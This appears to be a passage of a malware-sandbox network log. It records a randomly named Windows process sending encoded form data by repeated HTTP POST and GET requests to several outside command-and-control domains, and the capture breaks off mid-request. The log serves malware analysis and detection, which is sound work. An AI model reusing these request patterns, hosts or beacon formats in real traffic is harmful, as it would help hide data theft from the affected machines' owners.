                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.grimbo.boats
                                                          Origin: http://www.grimbo.boats
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.grimbo.boats/kxtt/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr4cR5Nx1LzzLMv9r0ijwMTgXrlU3OFtrlj7axr9g=
                                                          Timestamp: Jan 16, 2025 09:25:04.279062986 CET | Bytes transferred: 1088 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:04 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vWG%2FSM8qJ0DRVt5wzWoyamKXhz3Ag3gSbxVeTagXjq3%2B5PrmISaX54wrBoJ3ZPH5nrh19ZNPqmVnkolCU1LTFSuluDzVn5xn7eDyT9Ram51Ej17c0uZPyyy0j0SEkO4zXlk"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb6780d46ab45-YYZ
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13728&min_rtt=13728&rtt_var=6864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49981 | Destination IP: 172.67.182.198 | Destination Port: 80 | PID: 3304 | Process: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp: Jan 16, 2025 09:25:06.145678997 CET | Bytes transferred: 760 | Direction: OUT | Data:
                                                          POST /kxtt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.grimbo.boats
                                                          Origin: http://www.grimbo.boats
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.grimbo.boats/kxtt/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAA7T1H/5UdKM5YKB1q3asNhAjsy/XVyXasJYVGmZ
                                                          Timestamp: Jan 16, 2025 09:25:06.811521053 CET | Bytes transferred: 1091 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:06 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dG9Q%2Br8K4ZDKEBQ1kr%2FZqJy8tvBunTC4GIqYr%2BQgA0N34%2FARRgRfiV8pdBAoTUSJme3z%2Be%2FXzOOqFtSAoRXUp8DfFwhwq95Z%2BJYTxEaLPJA2ovqgVfXdt8aL6O1lC2U9Piox"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb687e8445890-IAD
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7243&min_rtt=7243&rtt_var=3621&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49982 | Destination IP: 172.67.182.198 | Destination Port: 80 | PID: 3304 | Process: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp: Jan 16, 2025 09:25:08.699939966 CET | Bytes transferred: 1777 | Direction: OUT | Data:
                                                          POST /kxtt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.grimbo.boats
                                                          Origin: http://www.grimbo.boats
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.grimbo.boats/kxtt/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k= [TRUNCATED]
                                                          Timestamp: Jan 16, 2025 09:25:09.398093939 CET | Bytes transferred: 1090 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:09 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P77ltRN%2BFyuc2GmUt6LAw4BVJS6TT2sWZwrK7mNOXF143G%2BlRLHUdpHYjV3MPKqMEfu34N9MoAWoTUn8DLCE1GebXO0qzUWzhw9ddzsBnVwi9J%2FTO8t%2BS1Xx7%2BrULGVYboSp"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb6980c7faadf-YYZ
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=14118&min_rtt=14118&rtt_var=7059&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1777&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49983 | Destination IP: 172.67.182.198 | Destination Port: 80 | PID: 3304 | Process: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp: Jan 16, 2025 09:25:11.242889881 CET | Bytes transferred: 484 | Direction: OUT | Data:
                                                          GET /kxtt/?R4Stj2k=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXj2cOA9AsjjYxFgIbzI/ZykrVUFshkofZlIAuVzcX4MBGxA==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.grimbo.boats
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Timestamp: Jan 16, 2025 09:25:11.930166006 CET | Bytes transferred: 1114 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:11 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B316oEP6nehNekEPmV%2BueJXQ7ST3BIWGP1zZddQCxxnZC%2BQF4Tb%2B9Q3Xw8GVS2DbsDLhyt5Dh6yTSFKbjLkuh6hws%2FhQ7GY09otUCyw3k1va%2F3i%2BcrKjXi9m1XMkL1zFjxhg"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb6a7db15ab5a-YYZ
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13632&min_rtt=13632&rtt_var=6816&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10


                                                          Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49984 | Destination IP: 134.122.133.80 | Destination Port: 80 | PID: 3304 | Process: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp: Jan 16, 2025 09:25:17.210191965 CET | Bytes transferred: 737 | Direction: OUT | Data:
                                                          POST /a59t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.44756.pizza
                                                          Origin: http://www.44756.pizza
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.44756.pizza/a59t/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpwAzzMU2IIZAiS5m/Nri2oXn+W5f3FSXG8uj4hg=
                                                          Timestamp: Jan 16, 2025 09:25:18.072521925 CET | Bytes transferred: 312 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Content-Length: 148
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:25:17 GMT
                                                          Etag: "6743f11f-94"
                                                          Server: nginx
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49985 | Destination IP: 134.122.133.80 | Destination Port: 80 | PID: 3304 | Process: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp: Jan 16, 2025 09:25:19.759061098 CET | Bytes transferred: 757 | Direction: OUT | Data:
                                                          POST /a59t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.44756.pizza
                                                          Origin: http://www.44756.pizza
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.44756.pizza/a59t/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlI7fuFxom1z+cf+Tm223cF5PSRHgK3LUmOk61x1m
                                                          Timestamp: Jan 16, 2025 09:25:20.608370066 CET | Bytes transferred: 312 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Content-Length: 148
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:25:20 GMT
                                                          Etag: "6743f11f-94"
                                                          Server: nginx
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49986 | Destination IP: 134.122.133.80 | Destination Port: 80 | PID: 3304 | Process: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp: Jan 16, 2025 09:25:22.321666956 CET | Bytes transferred: 1774 | Direction: OUT | Data:
                                                          POST /a59t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.44756.pizza
                                                          Origin: http://www.44756.pizza
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.44756.pizza/a59t/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k= [TRUNCATED]
                                                          Timestamp: Jan 16, 2025 09:25:23.165278912 CET | Bytes transferred: 312 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Content-Length: 148
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:25:23 GMT
                                                          Etag: "6743f11f-94"
                                                          Server: nginx
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.5 | 49987 | 134.122.133.80 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:25:24.866805077 CET | 483 | OUT | GET /a59t/?R4Stj2k=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acsoaYUTukUw5/VlLJHlB4H68wgcF/MAlZiH8mu7MSOf5Syg==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.44756.pizza
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:25:25.734050035 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                          Content-Length: 148
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:25:25 GMT
                                                          Etag: "6743f11f-94"
                                                          Server: nginx
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.5 | 49988 | 199.192.21.169 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:25:30.787894964 CET | 746 | OUT | POST /bowc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.lonfor.website
                                                          Origin: http://www.lonfor.website
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.lonfor.website/bowc/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAOYCxSH69JzZfafzu1T/Ln7Hf2kRXTQ76Yl52UZ4=
                                                          Jan 16, 2025 09:25:31.377538919 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:31 GMT
                                                          Server: Apache
                                                          Content-Length: 774
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.5 | 49989 | 199.192.21.169 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:25:33.346983910 CET | 766 | OUT | POST /bowc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.lonfor.website
                                                          Origin: http://www.lonfor.website
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.lonfor.website/bowc/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0brnm3ZgCgaTCGpGKOsE73vvAfkwf5ypSAJ+YPhQ
                                                          Jan 16, 2025 09:25:33.932046890 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:33 GMT
                                                          Server: Apache
                                                          Content-Length: 774
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.5 | 49990 | 199.192.21.169 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:25:35.888818979 CET | 1783 | OUT | POST /bowc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.lonfor.website
                                                          Origin: http://www.lonfor.website
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.lonfor.website/bowc/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k= [TRUNCATED]
                                                          Jan 16, 2025 09:25:36.462815046 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:36 GMT
                                                          Server: Apache
                                                          Content-Length: 774
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.5 | 49991 | 199.192.21.169 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:25:38.429352045 CET | 486 | OUT | GET /bowc/?R4Stj2k=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO84RxecymeNEzyLIaWcKrL+RZ5eMRfwg+qeUwmqwyFGBk9g==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.lonfor.website
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:25:39.016755104 CET | 933 | IN | HTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:38 GMT
                                                          Server: Apache
                                                          Content-Length: 774
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          17 | 192.168.2.5 | 49992 | 154.197.162.239 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:25:44.545206070 CET | 752 | OUT | POST /cf9p/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.investshares.net
                                                          Origin: http://www.investshares.net
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.investshares.net/cf9p/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Ascii: R4Stj2k=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIIwpyZVY+gcxEwxSxY3QaRrGpqdayH+beKZC5B8E=
                                                          Jan 16, 2025 09:25:45.120225906 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                          Server: nginx
                                                          Date: Wed, 15 Jan 2025 16:25:09 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 166
                                                          Connection: close
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          18 | 192.168.2.5 | 49993 | 154.197.162.239 | 80 | 3304 | C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 16, 2025 09:25:47.103009939 CET | 772 | OUT | POST /cf9p/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.investshares.net
                                                          Origin: http://www.investshares.net
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.investshares.net/cf9p/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
